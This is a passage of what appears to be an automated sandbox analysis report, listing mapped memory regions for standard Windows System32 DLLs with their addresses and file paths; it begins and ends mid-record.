1316 start_va = 0x7ffc467a0000 end_va = 0x7ffc467b1fff entry_point = 0x7ffc467a0000 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1317 start_va = 0x7ffc46950000 end_va = 0x7ffc469b5fff entry_point = 0x7ffc46950000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1318 start_va = 0x7ffc46a70000 end_va = 0x7ffc46a7afff entry_point = 0x7ffc46a70000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1319 start_va = 0x7ffc46a80000 end_va = 0x7ffc46ba0fff entry_point = 0x7ffc46a80000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1320 start_va = 0x7ffc46d10000 end_va = 0x7ffc46d22fff entry_point = 0x7ffc46d10000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1321 start_va = 0x7ffc484a0000 end_va = 0x7ffc484b4fff entry_point = 0x7ffc484a0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1322 start_va = 0x7ffc484c0000 end_va = 0x7ffc484d9fff entry_point = 0x7ffc484c0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1323 start_va = 0x7ffc484e0000 end_va = 0x7ffc484ecfff entry_point = 0x7ffc484e0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1324 start_va = 0x7ffc48ff0000 end_va = 0x7ffc49459fff entry_point = 0x7ffc48ff0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1325 start_va = 0x7ffc494a0000 end_va = 0x7ffc49522fff entry_point = 0x7ffc494a0000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1326 start_va = 0x7ffc49530000 end_va = 0x7ffc49540fff entry_point = 0x7ffc49530000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1327 start_va = 0x7ffc49550000 end_va = 0x7ffc49565fff entry_point = 0x7ffc49550000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1328 start_va = 0x7ffc49570000 end_va = 0x7ffc49647fff entry_point = 0x7ffc49570000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1329 start_va = 0x7ffc49650000 end_va = 0x7ffc496b2fff entry_point = 0x7ffc49650000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1330 start_va = 0x7ffc496c0000 end_va = 0x7ffc496e4fff entry_point = 0x7ffc496c0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1331 start_va = 0x7ffc496f0000 end_va = 0x7ffc49703fff entry_point = 0x7ffc496f0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1332 start_va = 0x7ffc49710000 end_va = 0x7ffc49807fff entry_point = 0x7ffc49710000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1333 start_va = 0x7ffc49810000 end_va = 0x7ffc49882fff entry_point = 0x7ffc49810000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1334 start_va = 0x7ffc49890000 end_va = 0x7ffc499c6fff entry_point = 0x7ffc49890000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1335 start_va = 0x7ffc4a100000 end_va = 0x7ffc4a17ffff entry_point = 0x7ffc4a100000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1336 start_va = 0x7ffc4a370000 end_va = 0x7ffc4a380fff entry_point = 0x7ffc4a370000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1337 start_va = 0x7ffc4a390000 end_va = 0x7ffc4a3a0fff entry_point = 0x7ffc4a390000 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1338 start_va = 0x7ffc4a3b0000 end_va = 0x7ffc4a42ffff entry_point = 0x7ffc4a3b0000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1339 start_va = 0x7ffc4a480000 end_va = 0x7ffc4a491fff entry_point = 0x7ffc4a480000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1340 start_va = 0x7ffc4a4e0000 end_va = 0x7ffc4a525fff entry_point = 0x7ffc4a4e0000 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1341 start_va = 0x7ffc4a530000 end_va = 0x7ffc4a56ffff entry_point = 0x7ffc4a530000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1342 start_va = 0x7ffc4a570000 end_va = 0x7ffc4a5b7fff entry_point = 0x7ffc4a570000 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1343 start_va = 0x7ffc4a6b0000 end_va = 0x7ffc4a6c6fff entry_point = 0x7ffc4a6b0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1344 start_va = 0x7ffc4b090000 end_va = 0x7ffc4b09dfff entry_point = 0x7ffc4b090000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1345 start_va = 0x7ffc4b0e0000 end_va = 0x7ffc4b0f0fff entry_point = 0x7ffc4b0e0000 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 1346 start_va = 0x7ffc4b170000 end_va = 0x7ffc4b1cefff entry_point = 0x7ffc4b170000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1347 start_va = 0x7ffc4b290000 end_va = 0x7ffc4b536fff entry_point = 0x7ffc4b290000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1348 start_va = 0x7ffc4b6e0000 end_va = 0x7ffc4b6ebfff entry_point = 0x7ffc4b6e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1349 start_va = 0x7ffc4b890000 end_va = 0x7ffc4b899fff entry_point = 0x7ffc4b890000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1350 start_va = 0x7ffc4b8c0000 end_va = 0x7ffc4b8d4fff entry_point = 0x7ffc4b8c0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1351 start_va = 0x7ffc4b8e0000 end_va = 0x7ffc4b920fff entry_point = 0x7ffc4b8e0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1352 start_va = 0x7ffc4b930000 end_va = 0x7ffc4bc6cfff entry_point = 0x7ffc4b930000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1353 start_va = 0x7ffc4bc70000 end_va = 0x7ffc4bf51fff entry_point = 0x7ffc4bc70000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1354 start_va = 0x7ffc4bfa0000 end_va = 0x7ffc4bfbcfff entry_point = 0x7ffc4bfa0000 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1355 start_va = 0x7ffc4bfc0000 end_va = 0x7ffc4c023fff entry_point = 0x7ffc4bfc0000 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1356 start_va = 0x7ffc4c030000 end_va = 0x7ffc4c044fff entry_point = 0x7ffc4c030000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1357 start_va = 0x7ffc4c110000 end_va = 0x7ffc4c1aefff entry_point = 0x7ffc4c110000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1358 start_va = 0x7ffc4c1b0000 end_va = 0x7ffc4c20afff entry_point = 0x7ffc4c1b0000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1359 start_va = 0x7ffc4c220000 end_va = 0x7ffc4c25efff entry_point = 0x7ffc4c220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1360 start_va = 0x7ffc4c270000 end_va = 0x7ffc4c279fff entry_point = 0x7ffc4c270000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1361 start_va = 0x7ffc4c280000 end_va = 0x7ffc4c2adfff entry_point = 0x7ffc4c280000 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1362 start_va = 0x7ffc4c2b0000 end_va = 0x7ffc4c30cfff entry_point = 0x7ffc4c2b0000 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1363 start_va = 0x7ffc4c310000 end_va = 0x7ffc4c32ffff entry_point = 0x7ffc4c310000 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1364 start_va = 0x7ffc4c330000 end_va = 0x7ffc4c337fff entry_point = 0x7ffc4c330000 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1365 start_va = 0x7ffc4c340000 end_va = 0x7ffc4c350fff entry_point = 0x7ffc4c340000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1366 start_va = 0x7ffc4c360000 end_va = 0x7ffc4c3f6fff entry_point = 0x7ffc4c360000 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 1367 start_va = 0x7ffc4c400000 end_va = 0x7ffc4c44bfff entry_point = 0x7ffc4c400000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1368 start_va = 0x7ffc4c5e0000 end_va = 0x7ffc4c5f7fff entry_point = 0x7ffc4c5e0000 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1369 start_va = 0x7ffc4c600000 end_va = 0x7ffc4c622fff entry_point = 0x7ffc4c600000 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1370 start_va = 0x7ffc4c630000 end_va = 0x7ffc4c674fff entry_point = 0x7ffc4c630000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1371 start_va = 0x7ffc4c680000 end_va = 0x7ffc4c770fff entry_point = 0x7ffc4c680000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1372 start_va = 0x7ffc4cf60000 end_va = 0x7ffc4cf73fff entry_point = 0x7ffc4cf60000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1373 start_va = 0x7ffc4cf80000 end_va = 0x7ffc4d043fff entry_point = 0x7ffc4cf80000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1374 start_va = 0x7ffc4d050000 end_va = 0x7ffc4d068fff entry_point = 0x7ffc4d050000 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1375 start_va = 0x7ffc4d070000 end_va = 0x7ffc4d0c7fff entry_point = 0x7ffc4d070000 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 1376 start_va = 0x7ffc4d0d0000 end_va = 0x7ffc4d130fff entry_point = 0x7ffc4d0d0000 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 1377 start_va = 0x7ffc4d140000 end_va = 0x7ffc4d147fff entry_point = 0x7ffc4d140000 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1378 start_va = 0x7ffc4d1b0000 end_va = 0x7ffc4d1effff entry_point = 0x7ffc4d1b0000 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1379 start_va = 0x7ffc4d1f0000 end_va = 0x7ffc4d1fafff entry_point = 0x7ffc4d1f0000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1380 start_va = 0x7ffc4d200000 end_va = 0x7ffc4d259fff entry_point = 0x7ffc4d200000 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1381 start_va = 0x7ffc4d2f0000 end_va = 0x7ffc4d306fff entry_point = 0x7ffc4d2f0000 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1382 start_va = 0x7ffc4d310000 end_va = 0x7ffc4d32cfff entry_point = 0x7ffc4d310000 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1383 start_va = 0x7ffc4d390000 end_va = 0x7ffc4d3a2fff entry_point = 0x7ffc4d390000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1384 start_va = 0x7ffc4d910000 end_va = 0x7ffc4d98efff entry_point = 0x7ffc4d910000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1385 start_va = 0x7ffc4d990000 end_va = 0x7ffc4d9cbfff entry_point = 0x7ffc4d990000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1386 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1387 start_va = 0x7ffc4f370000 end_va = 0x7ffc4f38cfff entry_point = 0x7ffc4f370000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1388 start_va = 0x7ffc4f620000 end_va = 0x7ffc4f651fff entry_point = 0x7ffc4f620000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1389 start_va = 0x7ffc4f660000 end_va = 0x7ffc4f686fff entry_point = 0x7ffc4f660000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1390 start_va = 0x7ffc4f690000 end_va = 0x7ffc4f6a7fff entry_point = 0x7ffc4f690000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1391 start_va = 0x7ffc4f6b0000 end_va = 0x7ffc4f832fff entry_point = 0x7ffc4f6b0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1392 start_va = 0x7ffc4f8f0000 end_va = 0x7ffc4f981fff entry_point = 0x7ffc4f8f0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1393 start_va = 0x7ffc4f990000 end_va = 0x7ffc4f9c8fff entry_point = 0x7ffc4f990000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1394 start_va = 0x7ffc4f9d0000 end_va = 0x7ffc4f9d8fff entry_point = 0x7ffc4f9d0000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 1395 start_va = 0x7ffc4f9e0000 end_va = 0x7ffc4fa14fff entry_point = 0x7ffc4f9e0000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1396 start_va = 0x7ffc4fb00000 end_va = 0x7ffc4fb35fff entry_point = 0x7ffc4fb00000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1397 start_va = 0x7ffc50700000 end_va = 0x7ffc50708fff entry_point = 0x7ffc50700000 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 1398 start_va = 0x7ffc50710000 end_va = 0x7ffc5073cfff entry_point = 0x7ffc50710000 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 1399 start_va = 0x7ffc50740000 end_va = 0x7ffc5074ffff entry_point = 0x7ffc50740000 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 1400 start_va = 0x7ffc50750000 end_va = 0x7ffc507a0fff entry_point = 0x7ffc50750000 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 1401 start_va = 0x7ffc507b0000 end_va = 0x7ffc507bbfff entry_point = 0x7ffc507b0000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1402 start_va = 0x7ffc507c0000 end_va = 0x7ffc5087dfff entry_point = 0x7ffc507c0000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1403 start_va = 0x7ffc50880000 end_va = 0x7ffc50915fff entry_point = 0x7ffc50880000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1404 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1405 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1406 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1407 start_va = 0x7ffc50bd0000 end_va = 0x7ffc50bebfff entry_point = 0x7ffc50bd0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1408 start_va = 0x7ffc50c00000 end_va = 0x7ffc50d30fff entry_point = 0x7ffc50c00000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1409 start_va = 0x7ffc50d40000 end_va = 0x7ffc50d7dfff entry_point = 0x7ffc50d40000 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 1410 start_va = 0x7ffc50ec0000 end_va = 0x7ffc50ed7fff entry_point = 0x7ffc50ec0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1411 start_va = 0x7ffc50ee0000 end_va = 0x7ffc50f93fff entry_point = 0x7ffc50ee0000 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 1412 start_va = 0x7ffc51180000 end_va = 0x7ffc511acfff entry_point = 0x7ffc51180000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1413 start_va = 0x7ffc511b0000 end_va = 0x7ffc51332fff entry_point = 0x7ffc511b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1414 start_va = 0x7ffc51410000 end_va = 0x7ffc5141ffff entry_point = 0x7ffc51410000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1415 start_va = 0x7ffc51420000 end_va = 0x7ffc5142ffff entry_point = 0x7ffc51420000 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 1416 start_va = 0x7ffc51430000 end_va = 0x7ffc5145dfff entry_point = 0x7ffc51430000 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 1417 start_va = 0x7ffc51460000 end_va = 0x7ffc514a1fff entry_point = 0x7ffc51460000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 1418 start_va = 0x7ffc514b0000 end_va = 0x7ffc514c5fff entry_point = 0x7ffc514b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1419 start_va = 0x7ffc514d0000 end_va = 0x7ffc514e6fff entry_point = 0x7ffc514d0000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1420 start_va = 0x7ffc51500000 end_va = 0x7ffc5156dfff entry_point = 0x7ffc51500000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1421 start_va = 0x7ffc51570000 end_va = 0x7ffc51580fff entry_point = 0x7ffc51570000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 1422 start_va = 0x7ffc51590000 end_va = 0x7ffc5159cfff entry_point = 0x7ffc51590000 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 1423 start_va = 0x7ffc515a0000 end_va = 0x7ffc515dffff entry_point = 0x7ffc515a0000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1424 start_va = 0x7ffc515e0000 end_va = 0x7ffc516dbfff entry_point = 0x7ffc515e0000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1425 start_va = 0x7ffc516e0000 end_va = 0x7ffc51759fff entry_point = 0x7ffc516e0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1426 start_va = 0x7ffc51760000 end_va = 0x7ffc5181ffff entry_point = 0x7ffc51760000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1427 start_va = 0x7ffc51820000 end_va = 0x7ffc51832fff entry_point = 0x7ffc51820000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1428 start_va = 0x7ffc51840000 end_va = 0x7ffc5185dfff entry_point = 0x7ffc51840000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1429 start_va = 0x7ffc51860000 end_va = 0x7ffc51886fff entry_point = 0x7ffc51860000 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1430 start_va = 0x7ffc51890000 end_va 